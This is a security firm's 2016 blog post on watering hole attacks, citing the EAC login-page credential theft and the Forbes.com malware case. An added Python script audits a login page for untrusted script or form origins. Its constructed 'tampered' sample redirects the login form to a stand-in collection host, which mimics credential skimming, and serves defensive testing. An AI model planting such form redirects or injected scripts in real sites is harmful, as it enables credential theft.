
Watering Hole Attacks: How Hackers Target You

Posted: December 29, 2016 to News.

Tags: Malware, Data Breach, Cloud Security

We may never know exactly what happened to the American electoral system during 2016, who was responsible, or how it influenced the election. But one incident from the 2016 election hacking gives real insight into what happened, without any political slant. Plus, if you read on, you’ll find out about a type of cyber-trap that you could have fallen into several times without ever knowing it.

The Election Assistance Commission (EAC) was set up in 2002 to help local officials run elections. Its website was home to voting guidelines and administration information, and it even helped make sure voting machines were secure. However, to access the information on the site you had to make an account and log in. And that’s what hackers preyed on. According to the Federal Times, hackers set up a watering hole on the login page to collect user login information. It’s estimated that hackers got access to 100 accounts, and even some that had administrative privileges on the site.

The good news is that the EAC site doesn’t connect with any vote-counting services. The bad news is that this didn’t stop the hackers from trying to turn a profit. The hackers did try to sell the credentials online, which means that these credentials could be used as a starting point for larger hacks in the future.

And that’s not the end of the story either, because watering hole attacks are a very real threat online today. Usually, hackers target a specific group with a watering hole attack, and the group they reach depends on the site they set up on. For example, in 2014 China-linked hackers planted malware on Forbes.com. By targeting Forbes, the hackers were going after leaders of various industries, but they took it a step further: they set the program to specifically target people with links to the defense industry.

These attacks are the reason hackers try to sell off any private information they can get their hands on, like viewing history, because to set up one of these attacks you must first know the sites that your target group frequents the most. If you’re going after the defense industry, that could be Forbes, but if you’re going after a human rights group or one specific company, it could be another site. Once a hacker has determined the best site to infect, they’ll find a vulnerability and inject their code. After that, all it takes is one click and they can infect anyone visiting the page.

Watering hole attacks are dangerous because the victims usually can’t tell that they’ve been hacked, which means they’ll carry the malware to other devices and secure sites. This makes watering hole attacks especially dangerous for organizations with several employees. While the heads of a company or a hospital may have very secure devices and networks, they cannot guarantee that all their employees do. And since an employee will not know they’re infected, they could easily infect an entire network.

So, if you’re a private practice and you do everything right to protect your patient data, a simple watering hole attack could throw all that preparation out the window because of one employee. But only if you let it. If you educate yourself and everyone with access to your network on how to tell if you’ve been hacked, what to do if you have been, and how to avoid malware in the first place, you’ll be ten steps ahead of most other organizations and stand a chance against hackers all over the world.
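One way a site owner can check a login page for the kind of injected code described above, as an added example that is not from the original post: it compares the script, iframe and form targets in a page snapshot against a list of trusted origins and flags inline scripts that were never approved. The page URL, origins and HTML snapshots are constructed sample values.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample values; substitute your own page URL and trusted origins.
PAGE_URL = "https://portal.example.org/login"
TRUSTED = {"https://portal.example.org", "https://cdn.example.org"}
WATCHED = {"script": "src", "iframe": "src", "form": "action"}

def digest(text):
    return hashlib.sha256(text.strip().encode()).hexdigest()

class PageAuditor(HTMLParser):
    """Records resources and inline scripts that are not in the baseline."""
    def __init__(self, approved_inline):
        super().__init__()
        self.approved_inline = approved_inline
        self.findings, self._inline = [], None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        url = attrs.get(WATCHED.get(tag, ""))
        if url:
            # Resolve relative and protocol-relative URLs before comparing origins.
            parts = urlparse(urljoin(PAGE_URL, url))
            origin = f"{parts.scheme}://{parts.netloc}"
            if origin not in TRUSTED:
                self.findings.append((tag, origin))
        if tag == "script" and not attrs.get("src"):
            self._inline = []  # start buffering an inline script body

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            body, self._inline = "".join(self._inline), None
            if body.strip() and digest(body) not in self.approved_inline:
                self.findings.append(("inline-script", digest(body)[:12]))

def audit(html, approved_inline=frozenset()):
    auditor = PageAuditor(approved_inline)
    auditor.feed(html)
    auditor.close()
    return auditor.findings

# Constructed snapshots of a login page: the known-good copy and a tampered one.
GOOD = '<script src="/static/app.js"></script><form action="/login" method="post"></form>'
TAMPERED = GOOD.replace('action="/login"', 'action="https://collect.example.net/in"') \
    + '<script src="//stats.example.net/t.js"></script><script>var k = 1;</script>'
```

Running `audit()` on a schedule against the live page and alerting on any non-empty result surfaces a changed form target or a new script origin before users report anything.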


About the Author

Craig Petronella, CEO and Founder of Petronella Technology Group
CEO, Founder & AI Architect, Petronella Technology Group

Craig Petronella founded Petronella Technology Group in 2002 and has spent more than 30 years working at the intersection of cybersecurity, AI, compliance, and digital forensics. He holds the CMMC Registered Practitioner credential (RP-1372) issued by the Cyber AB, is an NC Licensed Digital Forensics Examiner (License #604180-DFE), and completed MIT Professional Education programs in AI, Blockchain, and Cybersecurity. Craig also holds CompTIA Security+, CCNA, and Hyperledger certifications.

He is an Amazon #1 Best-Selling Author of 15+ books on cybersecurity and compliance, host of the Encrypted Ambition podcast (95+ episodes on Apple Podcasts, Spotify, and Amazon), and a cybersecurity keynote speaker with 200+ engagements at conferences, law firms, and corporate boardrooms. Craig serves as Contributing Editor for Cybersecurity at NC Triangle Attorney at Law Magazine and is a guest lecturer at NCCU School of Law. He has served as a digital forensics expert witness in federal and state court cases involving cybercrime, cryptocurrency fraud, SIM-swap attacks, and data breaches.

Under his leadership, Petronella Technology Group has served 2,500+ clients, maintained a zero-breach record among compliant clients, earned a BBB A+ rating every year since 2003, and been featured as a cybersecurity authority on CBS, ABC, NBC, FOX, and WRAL. The company leverages SOC 2 Type II certified platforms and specializes in AI implementation, managed cybersecurity, CMMC/HIPAA/SOC 2 compliance, and digital forensics for businesses across the United States.
